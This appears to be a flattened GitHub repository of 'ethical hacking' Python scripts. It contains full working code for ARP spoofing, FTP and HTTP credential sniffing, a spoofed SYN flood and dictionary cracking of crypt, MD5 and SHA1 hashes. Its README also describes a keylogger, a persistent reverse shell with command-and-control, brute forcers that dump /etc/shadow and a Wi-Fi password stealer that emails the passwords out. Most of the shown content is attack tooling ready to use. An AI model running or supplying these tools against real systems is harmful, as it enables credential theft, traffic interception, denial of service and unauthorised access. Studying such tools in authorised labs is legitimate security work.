├── Flooder_Sniffer_Spoofer_Scripts ├── arpSpoofer.py ├── ftpSniffer.py ├── httpSniffer.py ├── macChanger.py ├── macSniffer.py └── synFlooder.py ├── Network_Analysis_Scripts └── packetAnalyzer.py ├── Password_Cracking_Scripts ├── cryptForce.py ├── crypt_dictionary.txt ├── crypt_passwords.txt ├── hasher.py ├── md5Brute.py ├── md5_passwords.txt └── sha1Hash.py ├── README.md ├── README_Screenshots ├── advancedPortScanner_Screenshot.png ├── anonymousLogin_Screenshot.png ├── baseDigestAuth_Screenshot.png ├── bruteforcer_Screenshot.png ├── cryptForce_Screenshot.png ├── directoryDiscover_Screenshot.png ├── ftpBrute_Screenshot.png ├── ftpSniffer_Screenshot.png ├── gmailBruteforce_Screenshot.png ├── hasher_Screenshot.png ├── httpSniffer_Screenshot1.png ├── httpSniffer_Screenshot2.png ├── macChanger_Screenshot.png ├── macSniffer_Screenshot.png ├── md5Brute_Screenshot.png ├── packetAnalyzer_Screenshot1.png ├── packetAnalyzer_Screenshot2.png ├── portScan_Screenshot.png ├── retrieveBanner_Screenshot.png ├── reverseShell_Screenshot1.png ├── reverseShell_Screenshot2.png ├── reverseShell_Screenshot3.png ├── reverseShell_Screenshot4.png ├── reverseShell_Screenshot5.png ├── reverseShell_Screenshot6.png ├── reverseShell_Screenshot7.png ├── reverseShell_Screenshot8.png ├── reverseShell_Screenshot9.png ├── sha1hash_Screenshot.png ├── sshBrute_Screenshot.png ├── sshLogin_Screenshot.png ├── synFlooder_Screenshot.png ├── threaded_Screenshot1.png ├── threaded_Screenshot2.png └── vulnerabilityScanner_Screenshot.png ├── Reverse_Shell_Scripts ├── keylogger.py ├── reverseShell.py ├── server.py └── threaded.py ├── SSH_FTP_Scripts ├── anonymousLogin.py ├── ftpBrute.py ├── ftp_passwords.txt ├── passwords.txt ├── sshBrute.py └── sshLogin.py ├── Scanner_Scripts ├── advancedPortScanner.py ├── portScan.py ├── retrieveBanner.py ├── vulnerabilities.txt └── vulnerabilityScanner.py └── Web_Pen_Testing_Scripts ├── baseDigestAuth.py ├── bruteforcer.py ├── directoryDiscover.py ├── gmailBruteforce.py ├── passwordList.txt └── wifiStealer.py /Flooder_Sniffer_Spoofer_Scripts/arpSpoofer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from scapy.all import * 4 | 5 | def restore(dstIP, srcIP): 6 | dstMAC = getTargetMac(dstIP) 7 | srcMAC = getTargetMac(srcIP) 8 | packet = scapy.ARP(op=2, pdst=dstIP, hwdst=dstMAC, psrc=srcIP, hwsrc=srcMAC) 9 | scapy.send(packet, verbose=False) 10 | return 11 | 12 | def getTargetMac(ip): 13 | arp_request = scapy.ARP(pdst=ip) 14 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 15 | finalPacket = broadcast/arp_request 16 | answer = scapy.srp(finalPacket, timeout=2, verbose=False)[0] 17 | mac = answer[0][1].hwsrc 18 | return(mac) 19 | 20 | 21 | def spoof_arp(target_ip, spoofed_ip): 22 | mac = getTargetMac(target_ip) 23 | packet = scapy.ARP(op=2, hwdst=mac, pdst=target_ip, psrc=spoofed_ip) 24 | scapy.send(packet, verbose=False) 25 | return 26 | 27 | def main(): 28 | try: 29 | while True: 30 | for i in range (1, 255): 31 | spoof_arp("Target_IP", "Source_IP") 32 | except KeyboardInterrupt: 33 | print("[!] Program Interrupted") 34 | restore("Target_IP", "Source_IP") 35 | exit(0) 36 | 37 | main() 38 | -------------------------------------------------------------------------------- /Flooder_Sniffer_Spoofer_Scripts/ftpSniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/19/2021 4 | 5 | import optparse 6 | from scapy.all import * 7 | 8 | def ftpSniff(packet): 9 | dest = packet.getlayer(IP).dst 10 | raw = packet.sprintf('%Raw.load%') 11 | user = re.findall('(?i)USER (.*)' , raw) 12 | password = re.findall('(?i)PASS (.*)', raw) 13 | 14 | if user: 15 | print('[!] Detected FTP Login To: ' + str(dest)) 16 | print('[+] User: ' + str(user[0]).strip('\r\n')) 17 | elif password: 18 | print('[+] Password: ' + str(password[0]).strip('\r\n')) 19 | 20 | def main(): 21 | parser = optparse.OptionParser('Usage: ' +\ 22 | '-i ') 23 | parser.add_option('-i', dest='interface', \ 24 | type='string', help='Specify Interface to Listen On') 25 | (options,args) = parser.parse_args() 26 | if options.interface == None: 27 | print(parser.usage) 28 | exit(1) 29 | else: 30 | conf.iface = options.interface 31 | 32 | try: 33 | sniff(filter='tcp port 21', prn=ftpSniff) 34 | except KeyboardInterrupt: 35 | print('[!] Program Interrupted') 36 | exit(1) 37 | 38 | main() 39 | -------------------------------------------------------------------------------- /Flooder_Sniffer_Spoofer_Scripts/httpSniffer.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/19/2021 4 | 5 | import scapy.all as scapy 6 | from scapy_http import http 7 | 8 | def sniff(interface): 9 | scapy.sniff(iface=interface, store=False, prn=process_packets) 10 | 11 | def process_packets(packet): 12 | if packet.haslayer(http.HTTPRequest): 13 | url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path 14 | print('URL: ' + url.decode()) 15 | if packet.haslayer(scapy.Raw): 16 | load = packet[scapy.Raw].load 17 | for i in words: 18 | if i in str(load): 19 | print('Load: ' + load.decode()) 20 | break 21 | 22 | 23 | 24 | words = ["password", "user", "username", "login", "pass", "Username", "Password", "User", "Email"] 25 | sniff("eth0") 26 | -------------------------------------------------------------------------------- /Flooder_Sniffer_Spoofer_Scripts/macChanger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/18/2021 4 | 5 | import subprocess 6 | 7 | def changeMACAddress(interface, macAddr): 8 | subprocess.call(["ifconfig",interface,"down"]) 9 | subprocess.call(["ifconfig",interface,"hw","ether",macAddr]) 10 | subprocess.call(["ifconfig",interface,"up"]) 11 | 12 | def main(): 13 | interface = str(input('Enter Intreface to Change MAC Address of: ')) 14 | newMACAddr = input('Enter MAC Address to Change to: ') 15 | 16 | before = subprocess.check_output(["ifconfig",interface]) 17 | changeMACAddress(interface, newMACAddr) 18 | after = subprocess.check_output(["ifconfig",interface]) 19 | 20 | if(before == after): 21 | print("[-] MAC Address Change Failed") 22 | else: 23 | print('[+] MAC Address Change Successfully') 24 | 25 | main() 26 | -------------------------------------------------------------------------------- /Flooder_Sniffer_Spoofer_Scripts/macSniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/19/2020 4 | 5 | import socket 6 | from struct import * 7 | 8 | def ethAddress(addr): 9 | ret = "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % (addr[0], addr[1], addr[2], addr[3], addr[4], addr[5]) 10 | return ret 11 | 12 | try: 13 | s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) 14 | except: 15 | print('[-] Error Creating Socket Object') 16 | exit(1) 17 | 18 | while True: 19 | packet = s.recvfrom(65535) 20 | packet = packet[0] 21 | 22 | ethLength = 14 23 | ethHeader = packet[:ethLength] 24 | 25 | ether = unpack('!6s6sH', ethHeader) 26 | ethProtocol = socket.ntohs(ether[2]) 27 | print('[+} Destination MAC: ' + ethAddress(packet[0:6]) + ' | Source MAC: ' + ethAddress(packet[6:12]) + ' | Protocol: ' + str(ethProtocol)) 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /Flooder_Sniffer_Spoofer_Scripts/synFlooder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/19/2021 4 | 5 | from scapy.all import * 6 | 7 | def synFlood(src, target, message, dstPort): 8 | ipLayer = IP(src=src, dst=target) 9 | tcpLayer = TCP(sport=4444, dport=dstPort) 10 | rawLayer = Raw(load=message) 11 | packet = ipLayer/tcpLayer/rawLayer 12 | send(packet) 13 | 14 | src = input("Enter Source IP Address To Fake: ") 15 | target=input("Enter Target's IP Address: ") 16 | message = input("Enter Message FOR TCP Payload: ") 17 | dstPort= int(input("Enter Port to Block: ")) 18 | 19 | while True: 20 | synFlood(src, target, message, dstPort) 21 | -------------------------------------------------------------------------------- /Network_Analysis_Scripts/packetAnalyzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/20/2021 4 | 5 | import socket 6 | import os,sys 7 | import struct 8 | import binascii 9 | 10 | socketCreated = False 11 | socketSniffer = 0 12 | 13 | def analyzeUDPHeader(dataRecv): 14 | udpHeader = struct.unpack('!4H', dataRecv[:8]) 15 | srcPort = udpHeader[0] 16 | dstPort = udpHeader[1] 17 | length = udpHeader[2] 18 | checksum = udpHeader[3] 19 | data = dataRecv[8:] 20 | 21 | print('---------- UDP HEADER ----------') 22 | print('Source Port: %hu' % srcPort) 23 | print('Destination Port: %hu' % dstPort) 24 | print('Length: %hu' % length) 25 | print('Checksum: %hu\n' % checksum) 26 | 27 | return data 28 | 29 | def analyzeTCPHeader(dataRecv): 30 | tcpHeader = struct.unpack('!2H2I4H', dataRecv[:20]) 31 | srcPort = tcpHeader[0] 32 | dstPort = tcpHeader[1] 33 | seqNum = tcpHeader[2] 34 | ackNum = tcpHeader[3] 35 | offset = tcpHeader[4] >> 12 36 | reserved = (tcpHeader[5] >> 6) & 0x03ff 37 | flags = tcpHeader[4] & 0x003f 38 | window = tcpHeader[5] 39 | checksum = tcpHeader[6] 40 | urgPtr = tcpHeader[7] 41 | data = dataRecv[20:] 42 | 43 | urg = bool(flags & 0x0020) 44 | ack = bool(flags & 0x0010) 45 | psh = bool(flags & 0x0008) 46 | rst = bool(flags & 0x0004) 47 | syn = bool(flags & 0x0002) 48 | fin = bool(flags % 0x0001) 49 | 50 | print('---------- TCP HEADER ----------') 51 | print('Source Port: %hu' % srcPort) 52 | print('Destination Port: %hu' % dstPort) 53 | print('Sequence Number: %u' % seqNum) 54 | print('Acknowledgement: %u' % ackNum) 55 | print('Flags: ') 56 | print(' URG: %d | ACK: %d | PSH: %d | RST: %d | SYN: %d | FIN: %d' % (urg, ack, psh, rst, syn, fin)) 57 | print('Window Size: %hu' % window) 58 | print('Checksum: %hu' % checksum) 59 | print('Urgent Pointer: %hu\n' % urgPtr) 60 | 61 | return data 62 | 63 | def analyzeIP(dataRecv): 64 | ipHeader = struct.unpack('!6H4s4s', dataRecv[:20]) 65 | version = ipHeader[0] >> 12 66 | ihl = (ipHeader[0] >> 8) & 0x0f 67 | tos = ipHeader[0] & 0x00ff 68 | totalLength = ipHeader[1] 69 | ipID = ipHeader[2] 70 | flags = ipHeader[3] >> 13 71 | fragOffset = ipHeader[3] & 0x1fff 72 | ipTTL = ipHeader[4] >> 8 73 | ipProtocol = ipHeader[4] & 0x00ff 74 | checksum = ipHeader[5] 75 | srcAddr = socket.inet_ntoa(ipHeader[6]) 76 | dstAddr = socket.inet_ntoa(ipHeader[7]) 77 | data = dataRecv[20:] 78 | 79 | print('---------- IP HEADER ----------') 80 | print('Version: %hu' % version) 81 | print('IHL: %hu' % ihl) 82 | print('TOS: %hu' % tos) 83 | print('Length: %hu' % totalLength) 84 | print('ID: %hu' % ipID) 85 | print('Offset: %hu' % fragOffset) 86 | print('TTL: %hu' % ipTTL) 87 | print('Protocol: %hu' % ipProtocol) 88 | print('Checksum: %hu' % checksum) 89 | print('Source IP: %s' % srcAddr) 90 | print('Destination IP: %s\n' % dstAddr) 91 | 92 | if ipProtocol == 6: 93 | tcp_udp = "TCP" 94 | elif ipProtocol == 17: 95 | tcp_udp = "UDP" 96 | else: 97 | tcp_udp = "Other" 98 | 99 | return data, tcp_udp 100 | 101 | 102 | def analyzeEtherHeader(dataRecv): 103 | ipBool = False 104 | etherHeader = struct.unpack('!6s6sH',dataRecv[:14]) 105 | dstMac = binascii.hexlify(etherHeader[0]).decode() 106 | srcMac = binascii.hexlify(etherHeader[1]).decode() 107 | protocol = etherHeader[2] >> 8 108 | data = dataRecv[14:] 109 | 110 | print('---------- ETHERNET HEADER -----------') 111 | print('Destination MAC: %s:%s:%s:%s:%s:%s' % (dstMac[0:2], dstMac[2:4], dstMac[4:6], dstMac[6:8], dstMac[8:10], dstMac[10:12])) 112 | print('Source MAC: %s:%s:%s:%s:%s:%s' % (srcMac[0:2], srcMac[2:4], srcMac[4:6], srcMac[6:8], srcMac[8:10], srcMac[10:12])) 113 | print('Protocol: %hu\n' % protocol) 114 | 115 | if protocol == 0x08: 116 | ipBool = True 117 | 118 | return data, ipBool 119 | 120 | def main(): 121 | global socketCreated 122 | global socketSniffer 123 | 124 | if socketCreated == False: 125 | socketSniffer = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003)) 126 | socketCreated = True; 127 | 128 | dataRecv = socketSniffer.recv(2048) 129 | os.system('clear') 130 | 131 | dataRecv, ipBool = analyzeEtherHeader(dataRecv) 132 | 133 | if ipBool: 134 | dataRecv, tcp_udp = analyzeIP(dataRecv) 135 | else: 136 | return 137 | 138 | if tcp_udp == "TCP": 139 | dataRecv = analyzeTCPHeader(dataRecv) 140 | elif tcp_udp == "UDP": 141 | dataRecv = analyzeUDPHeader(dataRecv) 142 | else: 143 | return 144 | 145 | while True: 146 | main() 147 | 148 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/cryptForce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/13/2021 4 | 5 | import crypt 6 | from colorama import Fore 7 | 8 | def crackPassword(username, password): 9 | salt = password[0:2] 10 | dictionary = open('crypt_dictionary.txt', 'r') 11 | for word in dictionary: 12 | word = word.strip('\n') 13 | cryptPassword = crypt.crypt(word, salt) 14 | if password == cryptPassword: 15 | print(Fore.GREEN + '[+] Found Password\t\t\t' + username + ' : ' + word) 16 | return 17 | print(Fore.RED + '[-] Unable to Crack Password For:\t' + username) 18 | 19 | def main(): 20 | try: 21 | passwordFile = open('crypt_passwords.txt', 'r') 22 | except: 23 | print('[-] File Not Found') 24 | quit() 25 | for line in passwordFile.readlines(): 26 | username = line.split(':')[0] 27 | password = line.split(':')[1].strip('\n') 28 | #print(Fore.RED + '[*] Cracking Password For: ' + username) 29 | crackPassword(username, password) 30 | 31 | 32 | main() 33 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/crypt_dictionary.txt: -------------------------------------------------------------------------------- 1 | password 2 | administrator 3 | Password1 4 | root 5 | qwerty 6 | admin 7 | admin123 8 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/crypt_passwords.txt: -------------------------------------------------------------------------------- 1 | administrator:SHA1gRjmWMnwg 2 | admin1:SHLAvMU4ftW0U 3 | root:SHugK1irBntNw 4 | user:SHIXgjjO0E5Lc 5 | toor:SHfiBfNQ4hLP 6 | admin123:SHliYl4p5OyJQ 7 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/hasher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/13/2021 4 | 5 | import hashlib 6 | 7 | hashValue = input('Enter String to Hash: ') 8 | 9 | hashmd5 = hashlib.md5() 10 | hashmd5.update(hashValue.encode()) 11 | print('MD5 Hash: ' + hashmd5.hexdigest()) 12 | 13 | hashsha1 = hashlib.sha1(); 14 | hashsha1.update(hashValue.encode()) 15 | print('SHA1 Hash: ' + hashsha1.hexdigest()) 16 | 17 | hashsha224 = hashlib.sha224() 18 | hashsha224.update(hashValue.encode()) 19 | print('SHA224 Hash: ' + hashsha224.hexdigest()) 20 | 21 | hashsha256 = hashlib.sha256() 22 | hashsha256.update(hashValue.encode()) 23 | print('SHA256 Hash: ' + hashsha256.hexdigest()) 24 | 25 | hashsha512 = hashlib.sha512() 26 | hashsha512.update(hashValue.encode()) 27 | print('SHA512 Hash: ' + hashsha512.hexdigest()) 28 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/md5Brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/13/2021 4 | 5 | from colorama import Fore 6 | import hashlib 7 | 8 | def openFile(wordList): 9 | try: 10 | file = open(wordList, 'r') 11 | return file 12 | except: 13 | print("[-] File Not Found") 14 | quit() 15 | 16 | passwordHash = input('Enter MD5 Hash Value: ') 17 | wordList = input('Enter Path to Password File: ') 18 | file = openFile(wordList) 19 | 20 | for word in file: 21 | print(Fore.YELLOW + '[*] Trying: ' + word.strip('\n')) 22 | encodeWord = word.encode('UTF-8') 23 | md5Hash = hashlib.md5(encodeWord.strip()).hexdigest() 24 | 25 | if md5Hash == passwordHash: 26 | print(Fore.GREEN + '[+] Password Found: ' + word) 27 | exit(0) 28 | else: 29 | pass 30 | 31 | print('[-] Password Not in List') 32 | 33 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/md5_passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | root 4 | administrator 5 | Password1 6 | admin123 7 | toor 8 | -------------------------------------------------------------------------------- /Password_Cracking_Scripts/sha1Hash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Written By: Sahar Hathiramani 3 | # Date: 01/13/2021 4 | 5 | import urllib.request 6 | import hashlib 7 | from colorama import Fore 8 | 9 | sha1hash = input('[*] Enter SHA1 Hash: ') 10 | 11 | passwordList = str(urllib.request.urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt').read(), 'UTF-8') 12 | 13 | for password in passwordList.split('\n'): 14 | hashGuess = hashlib.sha1(bytes(password, 'UTF-8')).hexdigest() 15 | if hashGuess == sha1hash: 16 | print(Fore.GREEN + "[+] Password Found: " + str(password)) 17 | quit() 18 | else: 19 | print(Fore.RED + '[-] Password not found. Trying next password...') 20 | pass 21 | 22 | print("Password Not Found in Password List") 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ethical Hacking Python Scripts 2 | 3 | ## Flooder, Sniffer, and Spoofer Scripts 4 | 1. **arpSpoofer.py**: This Python script attempts to spoof ARP packets. The script will get the MAC address of the target IP address and attempt to send a packet from the local machine spoofed as the spoofed IP address. If the user interrupts the program while it is executing, the script will restore the ARP tables back to their original state. 5 | 6 | 2. **ftpSniffer.py**: This Python script is designed to sniff the host machine for any FTP attempts. When a user attempts to FTP onto a server, the script will print to the console the username, password, and IP used for the FTP connection.\ 7 | ![ftpSniffer Screenshot](README_Screenshots/ftpSniffer_Screenshot.png) 8 | 9 | 3. **httpSniffer.py**: This Python script is designed to sniff the host machine for any HTTP packet in an attempt to grab a packet that contains a user's username and password they used to log into a website. The script will print out the captured packet's URL for the site logged into and payload that contains the username and password. The below images show what the script will print to console when I attempt to log on to http://demo.testfire.net/login.jsp with the username and password of admin / admin.\ 10 | ![httpSniffer Screenshot 1](README_Screenshots/httpSniffer_Screenshot1.png) 11 | ![httpSniffer Screenshot 2](README_Screenshots/httpSniffer_Screenshot2.png) 12 | 13 | 4. **macChanger.py**: This Python script is designed to allow a user to change their MAC address of an interface of their choosing. The script will bring down the interface, change the MAC address, then bring the interface back up.\ 14 | ![macChange Screenshot](README_Screenshots/macChanger_Screenshot.png) 15 | 16 | 5. **macSniffer.py**: This Python script is designed to mimic the sniffing capabilities of Wireshark. This script will sniff all packets sent and received by the host machine and will print to the console the packet's destination and source MAC address and protocol being used.\ 17 | ![macSniffer Screenshot](README_Screenshots/macSniffer_Screenshot.png) 18 | 19 | 6. **synFlooder.py**: This Python script will attempt a SYN Flood attack. The script will consistently send packets to the destination IP address and port specified by the user, masquerading as an IP address different than the machine that is running the program. For example, this script can be used to block port 80 on the target, resulting in the target being unable to/slowly able to access the internet.\ 20 | ![synFlooder Screenshot](README_Screenshots/synFlooder_Screenshot.png) 21 | 22 | ## Network Analysis Scripts 23 | 1. **packetAnalyzer.py**: This Python program will analyze each packet received by the host machine and print out the contents of its Ethernet, IP, and TCP/UDP headers to the console. The script will differentiate the packet's protocol as either TCP or UDP and print their respective headers to the console.\ 24 | ![packetAnalyzer Screenshot 1](README_Screenshots/packetAnalyzer_Screenshot1.png)\ 25 | ![packetAnalyzer Screenshot 2](README_Screenshots/packetAnalyzer_Screenshot2.png) 26 | 27 | ## Password Cracking Scripts 28 | 1. **cryptForce.py**: This script attempts to mimic a dictionary attack against salted password. The script starts with grabbing the salt used by the passwords. By using a dictionary text file containing the most commonly used password, the script encrypts the dictionary passwords with the salt and compares them to passwords file which contain the user's pre-computed salted password. If the computer encrypted password matches the user's password, it prints the result to the console.\ 29 | ![cryptForce Screenshot](README_Screenshots/cryptForce_Screenshot.png) 30 | 31 | 2. **hasher.py**: Simple script that prints out the MD5, SHA1, SHA224. SHA256, and SHA512 hashes of the user specified phrase.\ 32 | ![hasher Screenshot](README_Screenshots/hasher_Screenshot.png) 33 | 34 | 3. **md5Brute.py**: This script will ask the user to input a pre-computed MD5 hash. It will compare the input to the MD5 hashes from the user specified file. If the password is a match, the script will print the un-hashed password to the console.\ 35 | ![md5Brute Password](README_Screenshots/md5Brute_Screenshot.png) 36 | 37 | 4. **sha1Hash.py**: The script will ask the user to input a pre-computed SHA1 hash. It will calculate the SHA1 hashes of the 10,000 more common passwords and compare them to the user inputted hash. If the hashes match, the script will print the un-hashed password to the console.\ 38 | ![sha1Hash Password](README_Screenshots/sha1hash_Screenshot.png) 39 | 40 | ## Reverse Shell Scripts 41 | 1. **keylogger.py**: A simple keylogger that can be run on the target machine to record all the keystrokes the target types while using the target machine. 42 | 43 | 2. **reverseShell.py**: Works in conjunction with server.py. This script is designed to be placed on the target machine and establish a connection with the command system, waiting to receive commands to execute and send back. 44 | 45 | 3. **server.py v1.0**: A simple Python script designed to listen for incoming connections on the host machine.\ 46 | ![reverseShell Screenshot 1](README_Screenshots/reverseShell_Screenshot1.png) 47 | 48 | **server.py v1.1**: Upgrade of the script. Allows the script to connect to a remote system (in this case it's the local machine) and send and receive messages between the two programs.\ 49 | ![reverseShell Screenshot 2](README_Screenshots/reverseShell_Screenshot2.png) 50 | 51 | **server.py v1.2**: Allows the script to now continuously execute commands on the remote system and print the results to the console.\ 52 | ![reverseShell Screenshot 3](README_Screenshots/reverseShell_Screenshot3.png) 53 | 54 | **server.py v1.3**: Increase the amount of data the server is able to receive and parse from the remote system by utilizing the JSON library. In this example, the script is able to receive the data from the command 'netstat -nr' which is above 1024 bytes and would have previously crashed the program.\ 55 | ![reverseShell Screenshot 4](README_Screenshots/reverseShell_Screenshot4.png) 56 | 57 | **server.py v1.4**: Add directory traversal functionality to the script to allow the host to navigate through the target's file system.\ 58 | ![reverseShell Screenshot 5](README_Screenshots/reverseShell_Screenshot5.png) 59 | 60 | **server.py v1.5**: Allow the server to upload (work in progress) and download (completed) files from the target machines. Pictured below is the download function.\ 61 | ![reverseShell Screenshot 6](README_Screenshots/reverseShell_Screenshot6.png) 62 | 63 | **server.py v1.6**: Allow the reverseShell.py script have persistence storage on target and masquerade itself in the Registry when running.\ 64 | ![reverseShell Screenshot 7](README_Screenshots/reverseShell_Screenshot7.png) 65 | 66 | **server.py v1.7**: Every time it's run, the reverse shell/backdoor program, will continuously try to establish a connection with the server. If it is unable to connect, it will wait 5 seconds before attempting to re-connect.\ 67 | ![reverseShell Screenshot 8](README_Screenshots/reverseShell_Screenshot8.png) 68 | 69 | **server.py v2.0**: Implement multiple new functions. Added the ability to download files to that target PC, capture screenshots of the target's monitor, check if the user has admin privileges on the target, allow the user to start programs on the target, and start and dump the contents of a keylogger. Below is an example of the newly added help section and the user checking if they have admin privileges./ 70 | ![reverseShell Screenshot 9](README_Screenshots/reverseShell_Screenshot9.png) 71 | 72 | 4. **threaded.py**: An extension of the server.py file that acts as a Command-and-Control Center that can connect to multiple target machines and execute commands on them individually or execute commands on all the machines at once.\ 73 | ![threaded Screenshot 1](README_Screenshots/threaded_Screenshot1.png) 74 | ![threaded Screenshot 1](README_Screenshots/threaded_Screenshot2.png) 75 | 76 | ## Scanner Scripts 77 | 1. **advancedPortScanner.py:** An upgraded portScan.py script. This program will allow the user to specify either a host name or IP address and multiple ports to scan. The script will resolve any host name provided to an IP address and print to the console if the ports specified by the user are open or closed.\ 78 | ![advancedPortScanner Screenshot](README_Screenshots/advancedPortScanner_Screenshot.png) 79 | 80 | 2. **portScan.py:** A simple port scanner coded in Python that asks to specify an IP address. With this IP address, the script will scan the first 1000 ports and print out which ports are open and which ports are closed.\ 81 | ![portScan Screenshot](README_Screenshots/portScan_Screenshot.png) 82 | 83 | 3. **retrieveBanner.py:** A python script that scans through the first 100 ports of a host the user inputs and attempts to retrieve the banners from the ports and prints the first 1024 bits of the banner to the console if it exists.\ 84 | ![retrieveBanner Screenshot](README_Screenshots/retrieveBanner_Screenshot.png) 85 | 86 | 4. **vulnerabilityScanner.py:** An expansion of the retrieveBanner.py. This script will scan multiple hosts rather than a single on and will check some of the most common ports (20/21 - FTP, 22 - SSH/SFTP/SCP, 25 - SMTP, 443 - HTTPS, 3389 - RDP) and retrieve the banners of those ports from each host if the port contains a vulnerability.\ 87 | ![vulnerabilityScanner Screenshot](README_Screenshots/vulnerabilityScanner_Screenshot.png) 88 | 89 | ## SSH / FTP Scripts 90 | 1. **anonymousLogin.py:** This script is designed to attempt an FTP Anonymous Login Attack. This script attempt to anonymously FTP login to the user supplied host. If the target host allows anonymous FTP login, the script print a success message to the console.\ 91 | ![anonymousLogin Screenshot](README_Screenshots/anonymousLogin_Screenshot.png) 92 | 93 | 2. **sshBrute.py:** An upgraded sshLogin.py script. This script is designed to all the user to input a host and username and attempts to SSH into the host and guess the username's password by reading passwords from a file. This file could be used to contain some of the most common password or default password used in systems. If the script is able to SSH into the host, it will attempt to print out all the encrypted passwords in the /etc/shadow file.\ 94 | ![sshBrute Screenshot](README_Screenshots/sshBrute_Screenshot.png) 95 | 96 | 3. **sshLogin.py:** This script attempts to SSH into the user inputted host and login in using the user inputted username and password. The script is able to skip the "Are you sure you want to continue connecting" prompt when logging into a new host. If the SSH connection is successful, the script will attempt to print out target's root user's encrypted password from the target's /etc/shadow file.\ 97 | ![sshLogin Screenshot](README_Screenshots/sshLogin_Screenshot.png) 98 | 99 | 4. **ftpBrute.py:** Reads through the specified username:password file in an attempt to brute force FTP login to the specified host. The username:password file could be used to contain some of the most common passwords or default passwords and after finding a misconfigured target that has FTP (port 20/21) enabled, it would read through the password file and try to connect to the host. If the script finds the correct username:password pair, it'll print the results to the console.\ 100 | ![ftpBrute Screenshot](README_Screenshots/ftpBrute_Screenshot.png) 101 | 102 | ## Web Penetration Testing Scripts 103 | 1. **baseDigestAuth.py**: Attempts to brute force login to the specified URL and using the specified password list. This script will utilize multi-threading to run efficiently.\ 104 | ![baseDigestAuth Screenshot](README_Screenshots/baseDigestAuth_Screenshot.png) 105 | 106 | 2. **bruteforcer.py**: Python script that attempts to brute force login into the URL specified in the script. If the username and password combination is found, it will be printed to the console. This script can be used to attempt to login into different types of login pages.\ 107 | ![bruteforcer Screenshot](README_Screenshots/bruteforcer_Screenshot.png) 108 | 109 | 3. **directoryDiscover.py**: Designed to look for hidden directories on a site specified by the user.\ 110 | ![directoryDiscover Screenshot](README_Screenshots/directoryDiscover_Screenshot.png) 111 | 112 | 4. **gmailBruteforce.py**: A simple Python script that attempts to brute force login into the user specified Gmail account. The program will print to the console if the login attempt was successful or not.\ 113 | ![gmailBruteforce Screenshot](README_Screenshots/gmailBruteforce_Screenshot.png) 114 | 115 | 5. **wifiStealer.py**: A simple Python script that attempts to retrieve the plaintext passwords of all Wi-Fi networks on the host. The script will then attempt to email the passwords to an email the user can specify and will save the output to a file. 116 | -------------------------------------------------------------------------------- /README_Screenshots/advancedPortScanner_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/advancedPortScanner_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/anonymousLogin_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/anonymousLogin_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/baseDigestAuth_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/baseDigestAuth_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/bruteforcer_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/bruteforcer_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/cryptForce_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/cryptForce_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/directoryDiscover_Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SHathi28/Ethical-Hacking-Python-Scripts/abadfe40910ae6ff9d6ca0a079564ed32a9d12c0/README_Screenshots/directoryDiscover_Screenshot.png -------------------------------------------------------------------------------- /README_Screenshots/ftpBrute_Screenshot.png: -------------------------------------------------------------------------------- 